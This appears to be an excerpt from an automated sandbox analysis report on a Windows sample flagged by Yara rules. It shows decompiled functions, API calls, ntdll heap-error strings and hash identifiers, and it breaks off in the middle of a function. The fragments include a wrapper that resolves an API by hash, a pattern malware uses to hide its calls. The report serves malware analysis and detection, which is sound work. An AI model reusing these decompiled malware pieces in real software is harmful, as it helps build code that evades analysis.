                            • Opcode ID: 3877e556111588e9469fa2d102dbdfdcd8ca97ece960bf6c982cc865be9e9a93
                            • Instruction ID: 937c65f5e0f1f22d85969d5e43ec9acf2c5a98bec9fdd19854bbadfff2e028de
                            • Opcode Fuzzy Hash: 3877e556111588e9469fa2d102dbdfdcd8ca97ece960bf6c982cc865be9e9a93
                            • Instruction Fuzzy Hash: D990027521108802D5106199840474A0005A7D0346F95C421A4414659DC6D588A57165
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004088C0, Relevance: .1, Instructions: 92COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.328058419.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                            • Instruction ID: 4c2b1df36aa7b29bb0fae7ecfb93cd688d28708cc461f9fe29ca3c1f3973371e
                            • Opcode Fuzzy Hash: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                            • Instruction Fuzzy Hash: EC213CB2D442085BCB10E6649D42BFF73AC9B50304F04057FF989A3181FA38BB498BA7
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004184A0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E004184A0(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E00418DD0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x413526
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}





                            0x004184b7
                            0x004184c2
                            0x004184cd
                            0x004184d1

                            APIs
                            • RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004184CD
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.328058419.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: AllocateHeap
                            • String ID: &5A
                            • API String ID: 1279760036-1617645808
                            • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                            • Instruction ID: 6eed1dfa6fdd4b996c8079955bb5808ea645f65af4e2973490dba1d49a230398
                            • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                            • Instruction Fuzzy Hash: 94E012B1200208ABDB14EF99DC41EA777ACAF88654F118559BA085B282CA30F9108AB0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00407270, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                            Download Yara Rule
                            C-Code - Quality: 82%
                            			E00407270(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E00419D30( &_v67, 0, 0x3f);
				E0041A910( &_v68, 3);
				_t12 = E00409B30(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E40(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409290(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                            0x00407270
                            0x0040727f
                            0x00407283
                            0x0040728e
                            0x0040729e
                            0x004072ae
                            0x004072b3
                            0x004072ba
                            0x004072bd
                            0x004072ca
                            0x004072cc
                            0x004072ce
                            0x004072eb
                            0x004072eb
                            0x00000000
                            0x004072ed
                            0x004072f2

                            APIs
                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072CA
                            Memory Dump Source
                            • Source File: 00000003.00000002.328058419.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: MessagePostThread
                            • String ID:
                            • API String ID: 1836367815-0
                            • Opcode ID: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
                            • Instruction ID: 34c16447600cfe3bfc53875ba7b31b7f06d917fb68e10caa6e1b72df1d8a1719
                            • Opcode Fuzzy Hash: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
                            • Instruction Fuzzy Hash: 9901D431A8022877E720A6959C03FFE776C5B00B55F05046EFF04BA1C2E6A87A0542EA
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00418632, Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                            Download Yara Rule
                            APIs
                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418670
                            Memory Dump Source
                            • Source File: 00000003.00000002.328058419.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: LookupPrivilegeValue
                            • String ID:
                            • API String ID: 3899507212-0
                            • Opcode ID: e9134973141dd8d8f34bf740ef6071b5f709cae7b0e721a5e81f67bdb3ee3df0
                            • Instruction ID: d7da3ef0cf131cb83787a37ee2126da6621765998874519d2564d467d60f9997
                            • Opcode Fuzzy Hash: e9134973141dd8d8f34bf740ef6071b5f709cae7b0e721a5e81f67bdb3ee3df0
                            • Instruction Fuzzy Hash: EB01F9B52041442BD714DF95BC81DE77B98EF88660F04865EFD8D47243C834E455CB74
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004184E0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E004184E0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E00418DD0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                            0x004184ef
                            0x004184f7
                            0x0041850d
                            0x00418511

                            APIs
                            • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041850D
                            Memory Dump Source
                            • Source File: 00000003.00000002.328058419.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: FreeHeap
                            • String ID:
                            • API String ID: 3298025750-0
                            • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                            • Instruction ID: 3ff41463f96ddcb9b979ffb1c010e7f29050f08b507ceaebb1b5cb1da4dac703
                            • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                            • Instruction Fuzzy Hash: A0E01AB12002086BD714DF59DC45EA777ACAF88750F014559B90857281C630E9108AB0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00418640, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00418640(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E00418DD0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                            0x0041865a
                            0x00418670
                            0x00418674

                            APIs
                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418670
                            Memory Dump Source
                            • Source File: 00000003.00000002.328058419.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: LookupPrivilegeValue
                            • String ID:
                            • API String ID: 3899507212-0
                            • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                            • Instruction ID: efef6450e86da2b54d6b49fe3c32415886d6c73e427b64be19593e81b86a73e4
                            • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                            • Instruction Fuzzy Hash: 1CE01AB12002086BDB10DF49DC85EE737ADAF88650F018159BA0857281C934E8108BF5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004184D9, Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E004184D9(void* __ecx, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t11;
				void* _t18;

				_t8 = _a4;
				_t4 = _t8 + 0xc74; // 0xc74
				E00418DD0(_t18, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t11 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t11;
			}





                            0x004184e3
                            0x004184ef
                            0x004184f7
                            0x0041850d
                            0x00418511

                            APIs
                            • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041850D
                            Memory Dump Source
                            • Source File: 00000003.00000002.328058419.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: FreeHeap
                            • String ID:
                            • API String ID: 3298025750-0
                            • Opcode ID: c20a14cca25623ce25995081ee9768666d2e4424e696adc3f3420bfbe80f5ea4
                            • Instruction ID: e098fc1e967335d09bbb1f72159d1bce7d6445ace89dd8cf1d4fc485bb2f68f1
                            • Opcode Fuzzy Hash: c20a14cca25623ce25995081ee9768666d2e4424e696adc3f3420bfbe80f5ea4
                            • Instruction Fuzzy Hash: 9CE026B41002845FDB10EF59D8C08AB7794AF803147108A4EEC6847606C131D86A8BB1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00418520, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00418520(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E00418DD0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                            0x00418523
                            0x0041853a
                            0x00418548

                            APIs
                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418548
                            Memory Dump Source
                            • Source File: 00000003.00000002.328058419.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID:
                            • API String ID: 621844428-0
                            • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                            • Instruction ID: 0124507ddd2f9c2d15af78755faa13525d8eeaf852c7518965348cd9efebe569
                            • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                            • Instruction Fuzzy Hash: A8D012716003187BD620DF99DC85FD7779CDF48790F018169BA1C5B281C571BA0086E1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0132967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 7e9caba1c1ca8359cebbd0f499fed4e8e31a9dac1947b2e8012fd708e75ab4af
                            • Instruction ID: c26b236d43ef1a1b13dfdeb6e9bb710c0781eb4059f635686fb2d157b05fb800
                            • Opcode Fuzzy Hash: 7e9caba1c1ca8359cebbd0f499fed4e8e31a9dac1947b2e8012fd708e75ab4af
                            • Instruction Fuzzy Hash: F6B09B719014D5C9DA11E7A45608717794077D0759F56C071D1020641B4778C095F6B5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            Function 0139B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON
                            Download Yara Rule
                            Strings
                            • an invalid address, %p, xrefs: 0139B4CF
                            • The resource is owned exclusively by thread %p, xrefs: 0139B374
                            • write to, xrefs: 0139B4A6
                            • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0139B314
                            • *** Resource timeout (%p) in %ws:%s, xrefs: 0139B352
                            • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0139B484
                            • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0139B2F3
                            • The instruction at %p referenced memory at %p., xrefs: 0139B432
                            • *** then kb to get the faulting stack, xrefs: 0139B51C
                            • The critical section is owned by thread %p., xrefs: 0139B3B9
                            • a NULL pointer, xrefs: 0139B4E0
                            • *** Inpage error in %ws:%s, xrefs: 0139B418
                            • read from, xrefs: 0139B4AD, 0139B4B2
                            • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0139B2DC
                            • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0139B53F
                            • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0139B3D6
                            • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0139B305
                            • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0139B39B
                            • Go determine why that thread has not released the critical section., xrefs: 0139B3C5
                            • The instruction at %p tried to %s , xrefs: 0139B4B6
                            • *** enter .exr %p for the exception record, xrefs: 0139B4F1
                            • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0139B476
                            • The resource is owned shared by %d threads, xrefs: 0139B37E
                            • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0139B38F
                            • <unknown>, xrefs: 0139B27E, 0139B2D1, 0139B350, 0139B399, 0139B417, 0139B48E
                            • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0139B47D
                            • *** An Access Violation occurred in %ws:%s, xrefs: 0139B48F
                            • *** enter .cxr %p for the context, xrefs: 0139B50D
                            • This failed because of error %Ix., xrefs: 0139B446
                            • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0139B323
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                            • API String ID: 0-108210295
                            • Opcode ID: dc95d1ad61f4faf13d5dea10e470b5a23c7f554ab5a213f05d20c642a1f7921c
                            • Instruction ID: b56444901093e60b177c3244a145c7bf1bf1cc1d5c92c26d7e8375f5150147bb
                            • Opcode Fuzzy Hash: dc95d1ad61f4faf13d5dea10e470b5a23c7f554ab5a213f05d20c642a1f7921c
                            • Instruction Fuzzy Hash: AA814335A40204FFDF35AA4EEC85E7BBF3AEF56A5AF014088F5042B156D2658801DBB2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 013A1C06, Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                            Download Yara Rule
                            C-Code - Quality: 44%
                            			E013A1C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x12c48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E012EB150();
				} else {
					E012EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x13d589c);
				E012EB150("Heap error detected at %p (heap handle %p)\n",  *0x13d58a0);
				_t27 =  *0x13d5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M013A1E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E012EB150();
				} else {
					E012EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E012EB150("Error code: %d - %s\n",  *0x13d5898);
				_t113 =  *0x13d58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E012EB150();
					} else {
						E012EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E012EB150("Parameter1: %p\n",  *0x13d58a4);
				}
				_t115 =  *0x13d58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E012EB150();
					} else {
						E012EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E012EB150("Parameter2: %p\n",  *0x13d58a8);
				}
				_t117 =  *0x13d58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E012EB150();
					} else {
						E012EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E012EB150("Parameter3: %p\n",  *0x13d58ac);
				}
				_t119 =  *0x13d58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E012EB150();
					} else {
						E012EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x13d58b4);
					E012EB150("Last known valid blocks: before - %p, after - %p\n",  *0x13d58b0);
				} else {
					_t120 =  *0x13d58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E012EB150();
				} else {
					E012EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E012EB150("Stack trace available at %p\n", 0x13d58c0);
			}











                            0x013a1c10
                            0x013a1c16
                            0x013a1c1e
                            0x013a1c3d
                            0x013a1c3e
                            0x013a1c20
                            0x013a1c35
                            0x013a1c3a
                            0x013a1c44
                            0x013a1c55
                            0x013a1c5a
                            0x013a1c65
                            0x013a1c67
                            0x00000000
                            0x013a1c6e
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x013a1c67
                            0x013a1cdc
                            0x013a1ce5
                            0x013a1d04
                            0x013a1d05
                            0x013a1ce7
                            0x013a1cfc
                            0x013a1d01
                            0x013a1d0b
                            0x013a1d17
                            0x013a1d1f
                            0x013a1d25
                            0x013a1d30
                            0x013a1d4f
                            0x013a1d50
                            0x013a1d32
                            0x013a1d47
                            0x013a1d4c
                            0x013a1d61
                            0x013a1d67
                            0x013a1d68
                            0x013a1d6e
                            0x013a1d79
                            0x013a1d98
                            0x013a1d99
                            0x013a1d7b
                            0x013a1d90
                            0x013a1d95
                            0x013a1daa
                            0x013a1db0
                            0x013a1db1
                            0x013a1db7
                            0x013a1dc2
                            0x013a1de1
                            0x013a1de2
                            0x013a1dc4
                            0x013a1dd9
                            0x013a1dde
                            0x013a1df3
                            0x013a1df9
                            0x013a1dfa
                            0x013a1e00
                            0x013a1e0a
                            0x013a1e13
                            0x013a1e32
                            0x013a1e33
                            0x013a1e15
                            0x013a1e2a
                            0x013a1e2f
                            0x013a1e39
                            0x013a1e4a
                            0x013a1e02
                            0x013a1e02
                            0x013a1e08
                            0x00000000
                            0x00000000
                            0x013a1e08
                            0x013a1e5b
                            0x013a1e7a
                            0x013a1e7b
                            0x013a1e5d
                            0x013a1e72
                            0x013a1e77
                            0x013a1e95

                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                            • API String ID: 0-2897834094
                            • Opcode ID: 7636a0db9a0d1a8b1d3585cf140ef18956ca38a13176aa211d9934ff99c34470
                            • Instruction ID: 6aa05fe94b246dbc7bf29d893c6ba0468a70bdae5361477f34ed36cc8a6ec3af
                            • Opcode Fuzzy Hash: 7636a0db9a0d1a8b1d3585cf140ef18956ca38a13176aa211d9934ff99c34470
                            • Instruction Fuzzy Hash: E461C33363214ADFD721AB89E489E3477F8EB04A74F8A806EF50E5F701D624D8408B5A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 008B1450, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100memorystringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 80%
                            			E008B1450(WCHAR* _a4) {
				WCHAR* _v8;
				signed int _v12;
				void* _v16;
				int _v20;
				long _t65;

				_v8 = 0;
				_v16 = 0;
				_v12 = 0;
				_v8 = _a4;
				while(( *_v8 & 0x0000ffff) != 0) {
					_v12 = _v12 + 1;
					_v8 =  &(_v8[lstrlenW(_v8)]);
					_v8 =  &(_v8[1]);
				}
				_v16 = HeapAlloc(GetProcessHeap(), 0, 8 + _v12 * 8);
				_v12 = 0;
				_v8 = _a4;
				while(( *_v8 & 0x0000ffff) != 0) {
					if(E008B1160(_v8, _v16 + _v12 * 8) != 0) {
						_v12 = _v12 + 1;
						_v8 =  &(_v8[lstrlenW(_v8)]);
						_v8 =  &(_v8[1]);
						continue;
					}
					HeapFree(GetProcessHeap(), 0, _v16);
					return 0;
				}
				 *(_v16 + _v12 * 8) = 0;
				 *(_v16 + 4 + _v12 * 8) = 0;
				_v20 = StartServiceCtrlDispatcherW(_v16);
				if(_v20 == 0) {
					_t65 = GetLastError();
					0x8b0000(_a4, _t65);
					0x8b0000("StartServiceCtrlDispatcherW failed to start %s: %u\n", _t65);
				}
				HeapFree(GetProcessHeap(), 0, _v16);
				return _v20;
			}








                            0x008b1456
                            0x008b145d
                            0x008b1464
                            0x008b146e
                            0x008b1471
                            0x008b1481
                            0x008b1494
                            0x008b149d
                            0x008b149d
                            0x008b14bc
                            0x008b14bf
                            0x008b14c9
                            0x008b14cc
                            0x008b14eb
                            0x008b150d
                            0x008b1520
                            0x008b1529
                            0x00000000
                            0x008b1529
                            0x008b14fa
                            0x00000000
                            0x008b1500
                            0x008b1534
                            0x008b1541
                            0x008b1553
                            0x008b155a
                            0x008b155c
                            0x008b1567
                            0x008b1572
                            0x008b1572
                            0x008b1584
                            0x00000000

                            APIs
                            • lstrlenW.KERNEL32(00000000), ref: 008B1488
                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008B14AF
                            • HeapAlloc.KERNEL32(00000000), ref: 008B14B6
                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008B14F3
                            • HeapFree.KERNEL32(00000000), ref: 008B14FA
                            • lstrlenW.KERNEL32(00000000), ref: 008B1514
                            • StartServiceCtrlDispatcherW.ADVAPI32(00000000), ref: 008B154D
                            • GetLastError.KERNEL32 ref: 008B155C
                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008B157D
                            • HeapFree.KERNEL32(00000000), ref: 008B1584
                            Strings
                            • StartServiceCtrlDispatcherW failed to start %s: %u, xrefs: 008B156D
                            Memory Dump Source
                            • Source File: 00000003.00000002.328173414.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true
                            • Associated: 00000003.00000002.328151588.00000000008B0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.328204526.00000000008BD000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.328217565.00000000008C2000.00000008.00020000.sdmp Download File
                            • Associated: 00000003.00000002.328229150.00000000008C6000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Heap$Process$Freelstrlen$AllocCtrlDispatcherErrorLastServiceStart
                            • String ID: StartServiceCtrlDispatcherW failed to start %s: %u
                            • API String ID: 3118973391-2801566792
                            • Opcode ID: 5a57d0d45a630cbfcc9f9191d20d147928e6ae7f53b237613fb9037af871496e
                            • Instruction ID: 38355a1cc0cb3c84be2ea40f97b75c5f36500dbf53a1c74c6a0ba59b9a63592f
                            • Opcode Fuzzy Hash: 5a57d0d45a630cbfcc9f9191d20d147928e6ae7f53b237613fb9037af871496e
                            • Instruction Fuzzy Hash: 9341C8B4D00209FFDB14EFA4C958BAEBBB5FF48305F208199E545AB350D7359A41DB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 012F3D34, Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                            Download Yara Rule
                            C-Code - Quality: 96%
                            			E012F3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E012F1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L013077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E012F1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
